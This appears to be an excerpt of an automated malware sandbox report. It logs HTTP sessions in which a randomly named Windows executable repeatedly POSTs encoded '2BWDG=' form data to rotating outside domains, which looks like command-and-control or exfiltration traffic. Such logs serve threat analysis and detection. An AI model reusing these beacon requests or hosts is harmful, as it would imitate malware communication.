                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==
                                                                                                                            set-cookie: parking_session=999f9fc2-6b10-453b-9dfa-c4938ce814af; expires=Sat, 19 Oct 2024 11:13:30 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 19, 2024 12:58:31.054819107 CEST | 587 | IN
                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTk5ZjlmYzItNmIxMC00NTNiLTlkZmEtYzQ5MzhjZTgxNGFmIiwicGFnZV90aW1lIjoxNzI5MzM1NT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50030 | 199.59.243.227 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:32.979406118 CEST | 10977 | OUT | POST /axh7/ HTTP/1.1
                                                                                                                            Host: www.662-home-nb.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.662-home-nb.shop
                                                                                                                            Referer: http://www.662-home-nb.shop/axh7/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=LXiyCe8Ra1a4+s6lLTi++smhPgfKTn8S3zQh40v3xz/8qKduLcSWKlLYyNWOlea/QLLN/Jzh3EkJLEidB3pXxOFZZfoEf+IqdDKsznMHM4TnpZpbANxaARmoJ84n0QHmQieZXgL2jZkdVokjPqmCTvEVI+SG60JgSOGkHtGXl98HTe0NnLW3uiGfucvjWPvnYGsp1jc7QH1mKywSv3+ORT6qRIE/LOS14Bk4O139Zr2LE9YfhO5lDV3HmUPFD7WY87XzkxsyNW1eg8/u/4WYsi3bvbhYSrGmM+e0KidhPf2iXAny2di6Zn6jkwIIz5rU54kB4c/dPJ91nnzHcYlSoFVGzM3jVbVKW6JvoWPlHwYAPBJlJwwhRGY/KRHw5+5o7//zAKzCMkdiPthIy+I+HbRNh+4RG3+HC46wasKtLgjIURizNu5NNB4fz8xcHkkPvzTnCYp1rMY1Dq9Tij9taU6Iq0ZL5doTJQS7pdGycmRJKMTOS83dNfaBgUHGAEUMiguAdAZTeziu2hd4zZQ0FZefI7m/pbrga8Vgz+4q9jPYPB8S2DBCFAcz0ygSoWrXIm73uiSKpOtphmXr4zOLWhjwsRNVV0YjBCNec6rmq0B0rZKZYOakFzXGrXxCjZGLAvUoAwlcCe9WtnMaAG7cgy7+lu1rYdYAeXr2ezpGrk64cI1gW7JccyqH1iER7hoXroZp8WqLY7rQGJNMl25WST/iN1aY7ZtRKIPzSHk6SJEikjWwJFT4hmYqSSBFawC/BKcSkw6yI85L7jUMqWh9wtOwWFXu/7XPXLdkbwDN6BKNJQfKYAUn7+OAQ1sNPyOJEVFzL7KY3eG1x6o+hP0V2nXKy677zkVdsiOo5m57cHCoAvLH0TZ+65a3DtrqOHe8U99XJxuFteDD7gGb7Y/X98iggLHugIvNe8JWp3zrVR7nRy4ukAcqsFyTMeSnIJSMjbho1ZXAQ+DHSmpn+H83Yunamoy/r8A1IDNDr70TVDDLN0 [TRUNCATED]
                                                                                                                             Oct 19, 2024 12:58:33.656591892 CEST  1236               IN         HTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:33 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1134
                                                                                                                            x-request-id: a6b38ced-5ce2-4ec3-97a2-4b5d73484a00
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==
                                                                                                                            set-cookie: parking_session=a6b38ced-5ce2-4ec3-97a2-4b5d73484a00; expires=Sat, 19 Oct 2024 11:13:33 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cvx2N/2yCOQvV3MRxHe8Pw1R4aPS50GWSORkmYLZkLoFVzEtZyP6LZuXb1qdVmZKd7bI8vQ6ssytTTlgN+cASg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                             Oct 19, 2024 12:58:33.656622887 CEST  587                IN
                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTZiMzhjZWQtNWNlMi00ZWMzLTk3YTItNGI1ZDczNDg0YTAwIiwicGFnZV90aW1lIjoxNzI5MzM1NT


                                                                                                                             Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                             24          192.168.2.4  50031        199.59.243.227  80                3980  C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp                             Bytes transferred  Direction  Data
                                                                                                                             Oct 19, 2024 12:58:35.516201973 CEST  599                OUT        GET /axh7/?2BWDG=GVKSBocRMS2FyqXHPjOj9+OrOzTrYXMr5CJl/TLorgfRhIZbevfCFnb7jtSuw/m1FqikvKjm63UqVHDKIE9/vbA5AM47cN5qZi+S7x4iOYPaiZ0KOepXdRg=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.662-home-nb.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                             Oct 19, 2024 12:58:36.149228096 CEST  1236               IN         HTTP/1.1 200 OK
                                                                                                                            date: Sat, 19 Oct 2024 10:58:35 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1470
                                                                                                                            x-request-id: ad4b6f1c-a2f8-4c35-9ee3-b0989c10458c
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cqqngY63WrEuSE1lE3W5vFDJ3GZFuVrC4ja9FZiTv+6MNyJUCywvbTiqXkMcfVutoxFYuuSmB/y84brKDGPVPw==
                                                                                                                            set-cookie: parking_session=ad4b6f1c-a2f8-4c35-9ee3-b0989c10458c; expires=Sat, 19 Oct 2024 11:13:36 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cqqngY63WrEuSE1lE3W5vFDJ3GZFuVrC4ja9FZiTv+6MNyJUCywvbTiqXkMcfVutoxFYuuSmB/y84brKDGPVPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                             Oct 19, 2024 12:58:36.149247885 CEST  923                IN
                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWQ0YjZmMWMtYTJmOC00YzM1LTllZTMtYjA5ODljMTA0NThjIiwicGFnZV90aW1lIjoxNzI5MzM1NT


                                                                                                                             Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                             25          192.168.2.4  50032        172.67.196.90   80                3980  C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp                             Bytes transferred  Direction  Data
                                                                                                                             Oct 19, 2024 12:58:41.305579901 CEST  884                OUT        POST /9ect/ HTTP/1.1
                                                                                                                            Host: www.stopgazviganais.org
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.stopgazviganais.org
                                                                                                                            Referer: http://www.stopgazviganais.org/9ect/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=Z9D5r3NrG8MKO+Zc72g+Z/zqAomYvtm2KDyD2GZZLw0xEYIOfPSkC97FTQ5q85PKDOqmp+qopFE4pgw3rvJWEo+o26scRF5qGsdO2HXsf4erUW1lfxmlorSatjF9CRMwGrhNENbgR50r8gi3KX8PltlLMKjEzUg0gMDD7pqBU8poYI7Jw6Iq8r+snu0piFwbvA==
                                                                                                                             Oct 19, 2024 12:58:41.958129883 CEST  995                IN         HTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:41 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.mothersalwaysright.com/9ect/
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3028TEBOD%2BfZa2PtU7SRgXovEwfDNtHlQckN7jxzU2T7iu9ydk5EZwJC8ADbDYk%2Fd2Tpa10uMfktujQjlqNwnyfb6PCoXFKOnfnxTkq6TcFFYJEUQBCLFlmijRbteKq30mNUL8u329E5hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d5041238b962e69-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=884&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Ascii: ae<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx-rc/1.25.3.2</center></body></html>
                                                                                                                             Oct 19, 2024 12:58:41.958148003 CEST  5                  IN
                                                                                                                            Data Ascii: 0


                                                                                                                             Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                             26          192.168.2.4  50033        172.67.196.90   80                3980  C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp                             Bytes transferred  Direction  Data
                                                                                                                             Oct 19, 2024 12:58:43.851504087 CEST  904                OUT        POST /9ect/ HTTP/1.1
                                                                                                                            Host: www.stopgazviganais.org
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.stopgazviganais.org
                                                                                                                            Referer: http://www.stopgazviganais.org/9ect/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=Z9D5r3NrG8MKPdRc6RU+efztMImYlNm6KD2D2Hd3LiQxF9sOeOSkPd7Fbw5rzZPDDO2up/WopEk4pk43qYVRF4+qq6saO15qGsdO2HSHf8yrUmFleVKm0bSZlDF9RBM8GrhjEM21R6Mr8gS3LEkO/9kCBqiE+2FM5uLJleDmJ/1bdOqThLp9uraf6p9dvGNS0MXRnFhoh4OUHdKoZSZSY9Y=
                                                                                                                             Oct 19, 2024 12:58:44.515961885 CEST  1000               IN         HTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:44 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.mothersalwaysright.com/9ect/
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f6vk5PH5w0mwcxCMBRHhFZ6JZLjpgXqUYwLfqTyhPpfzboOBhJVdQOX2A6HCc4rEIGfMR%2BVfXiNoNzpavRCicbJ1I4OTYQ2XmKnl84nLwRePSzeXRrKAgpYAeP%2Bj7IoM7eOapw5Ltz5GXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d5041338c483172-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1465&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=904&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Ascii: ae<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx-rc/1.25.3.2</center></body></html>0


                                                                                                                             Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                             27          192.168.2.4  50034        172.67.196.90   80                3980  C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp                             Bytes transferred  Direction  Data
                                                                                                                             Oct 19, 2024 12:58:46.396898985 CEST  10986              OUT        POST /9ect/ HTTP/1.1
                                                                                                                            Host: www.stopgazviganais.org
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.stopgazviganais.org
                                                                                                                            Referer: http://www.stopgazviganais.org/9ect/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Oct 19, 2024 12:58:47.125828028 CEST | 1003 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:47 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.mothersalwaysright.com/9ect/
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOX1nFHWjyzJdxFWG8TH3o6OrcQ3AuWgDz9xRtO06zcKP4R5%2BGC1vZJXaFw2z9lZBF6zPSWgXJ4zRqxz8iwJYwpYVUUw9ESCcRDZO%2BDm9Is2miljqt3ktpv55Zy2NjH0sHbq5QLccMQ65w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d5041436f127d5d-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1043&sent=6&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10986&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Ascii: ae<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx-rc/1.25.3.2</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50035 | 172.67.196.90 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:48.941499949 CEST | 602 | OUT | GET /9ect/?2BWDG=U/rZoA1baL0SL+0w4EIlW/PNU4WGlNOJMCqR5hBTWTt3GNoAWeGWO/yRUixBoPW1Dvb67sqohAoonSA3rpdCYc2/1Z8mRmloUf5F40vQT8nvaVFEdkWR3Yo=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.stopgazviganais.org
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
Oct 19, 2024 12:58:49.609735966 CEST | 963 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Sat, 19 Oct 2024 10:58:49 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Location: https://www.mothersalwaysright.com/9ect/?2BWDG=U/rZoA1baL0SL+0w4EIlW/PNU4WGlNOJMCqR5hBTWTt3GNoAWeGWO/yRUixBoPW1Dvb67sqohAoonSA3rpdCYc2/1Z8mRmloUf5F40vQT8nvaVFEdkWR3Yo=&wfm=G6oTo8vx
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQv6be%2FVwNVV3m2giCZumwGooXdO6F1QRiLvH%2F3YizyGzonjs7InLlh%2B5Ba7EjXeu%2BYd9rJGNjavDJMS%2BicC%2FW3nG2Iy4xGA1i49iSzKvChKxzJdrOJurXmgJa6AoExrQBWSm1A1irTjhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d5041535a5e6b64-DFW
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2284&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=602&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Oct 19, 2024 12:58:49.609761000 CEST | 185 | IN
                                                                                                                            Data Ascii: ae<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx-rc/1.25.3.2</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 50036 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:54.679333925 CEST | 887 | OUT | POST /o6ua/ HTTP/1.1
                                                                                                                            Host: www.whiterabbitgroup.pro
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.whiterabbitgroup.pro
                                                                                                                            Referer: http://www.whiterabbitgroup.pro/o6ua/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=CvM0dGRdIGjmOuGMMraiz3NPAueftrcGoQEdI1PmKVnFL9VggEnFGgaU8AypBGqW3TJMGZxvggZjG+YwU0nGVNXyL8VSGIjaMqNkcGzAbzyCQ6aoUcrYHnDVaS5VCr4uD4o8VxDOVPdNfYHGARjY3/YO47YPywrWcjR0sPHDFJVAKZTPhfTB+7icJ82U+rqmqg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 50037 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:57.223731995 CEST | 907 | OUT | POST /o6ua/ HTTP/1.1
                                                                                                                            Host: www.whiterabbitgroup.pro
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.whiterabbitgroup.pro
                                                                                                                            Referer: http://www.whiterabbitgroup.pro/o6ua/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Ascii: 2BWDG=CvM0dGRdIGjmMOWMOIyi43NMFuefjLcCoQAdI0L2KD3FLdlghFnFFgaUzgyocWqr3TMxGd1vggNjG+owUD7ZUdXwEcVQLojaMqNkcCilbzqCQKqoU9qOZ3DSQy5VGr4qD4oeVwfoVMlNfcLGAEeOiPYI1bZLzFegbRk8l+H4NrFEG/CVwuyWs7GvU7/gzoXvxlgBvumArKiycpuu/Fg6Ucw=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 50038 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:58:59.770391941 CEST | 10989 | OUT | POST /o6ua/ HTTP/1.1
                                                                                                                            Host: www.whiterabbitgroup.pro
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.whiterabbitgroup.pro
                                                                                                                            Referer: http://www.whiterabbitgroup.pro/o6ua/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 50039 | 3.33.130.190 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
Timestamp | Bytes transferred | Direction | Data
Oct 19, 2024 12:59:02.315072060 CEST | 603 | OUT | GET /o6ua/?wfm=G6oTo8vx&2BWDG=PtkUewcqXhXGGI7VMrya73N+Qsazq4YwnB9JayH4Wx/cNc5hllniCA+e9SSCe0uJ5GQ5bYdUyDtJB9Y3dlvxJqubD8cdfqbVHrRmeQrxGVujTIKJZNnfFV0= HTTP/1.1
                                                                                                                            Host: www.whiterabbitgroup.pro
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
